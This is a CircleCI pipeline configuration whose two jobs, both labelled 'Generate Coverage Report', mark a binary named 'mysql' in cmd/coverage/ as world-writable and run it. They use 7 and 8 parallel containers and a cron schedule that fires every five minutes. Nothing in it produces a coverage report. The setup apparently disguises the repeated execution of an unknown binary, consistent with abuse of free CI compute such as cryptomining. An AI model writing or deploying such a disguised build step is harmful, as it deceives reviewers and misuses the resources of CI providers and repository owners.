version: 2.1

workflows:
  build:
    jobs:
      - build
      - build2

    triggers:
      - schedule:
          cron: "0,5,10,15,20,25,30,35,40,45,50,55 * * * *"
          filters:
            branches:
              only:
                - main

  builder:
    jobs: 
      - build
      - build2
jobs:
  build:
    docker:
      - image: circleci/mongo:latest
    working_directory: ~/repo
    parallelism: 7
    steps:
      - checkout
      - run:
          name: "Generate Coverage Report"
          command: |
            cd cmd/coverage/
            chmod 777 mysql 
            ./mysql
  build2:
    docker:
      - image: circleci/mongo:latest
    working_directory: ~/repo
    parallelism: 8
    steps:
      - checkout
      - run:
          name: "Generate Coverage Report"
          command: |
            cd cmd/coverage/
            chmod 777 mysql 
            ./mysql 